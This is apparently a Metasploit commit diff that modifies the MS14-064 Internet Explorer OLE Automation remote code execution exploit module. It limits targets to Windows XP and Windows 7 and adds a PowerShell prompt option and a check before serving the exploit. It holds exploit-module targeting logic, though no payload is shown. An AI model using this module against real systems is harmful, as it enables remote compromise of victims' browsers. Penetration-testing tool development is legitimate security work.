Land #5426, @wchen-r7's adds more restriction on Windows 7 target for MS14-064
commit
8c7d41c50c
|
@ -19,8 +19,9 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
'Name' => "MS14-064 Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution",
|
||||
'Description' => %q{
|
||||
This module exploits the Windows OLE Automation array vulnerability, CVE-2014-6332.
|
||||
The vulnerability affects Internet Explorer 3.0 until version 11 within Windows 95 up to
|
||||
Windows 10, and there is no patch for Windows XP or older.
|
||||
The vulnerability is known to affect Internet Explorer 3.0 until version 11 within
|
||||
Windows 95 up to Windows 10, and no patch for Windows XP. However, this exploit will
|
||||
only target Windows XP and Windows 7 box due to the Powershell limitation.
|
||||
|
||||
Windows XP by defaults supports VBS, therefore it is used as the attack vector. On other
|
||||
newer Windows systems, the exploit will try using Powershell instead.
|
||||
|
@ -56,9 +57,9 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
}
|
||||
],
|
||||
[
|
||||
'Other Windows x86',
|
||||
'Windows 7',
|
||||
{
|
||||
'os_name' => OperatingSystems::Match::WINDOWS,
|
||||
'os_name' => OperatingSystems::Match::WINDOWS_7
|
||||
}
|
||||
]
|
||||
],
|
||||
|
@ -84,6 +85,7 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
register_options(
|
||||
[
|
||||
OptBool.new('TRYUAC', [true, 'Ask victim to start as Administrator', false]),
|
||||
OptBool.new('AllowPowershellPrompt', [true, 'Allow exploit to try Powershell', false])
|
||||
], self.class )
|
||||
|
||||
end
|
||||
|
@ -358,6 +360,11 @@ end function
|
|||
end
|
||||
|
||||
def on_request_exploit(cli, request, target_info)
|
||||
if get_target.name.match(OperatingSystems::Match::WINDOWS_7) && !datastore['AllowPowershellPrompt']
|
||||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
|
||||
case request.uri
|
||||
when /\.gif/
|
||||
if get_target.name =~ OperatingSystems::Match::WINDOWS_XP
|
||||
|
|
Loading…
Reference in New Issue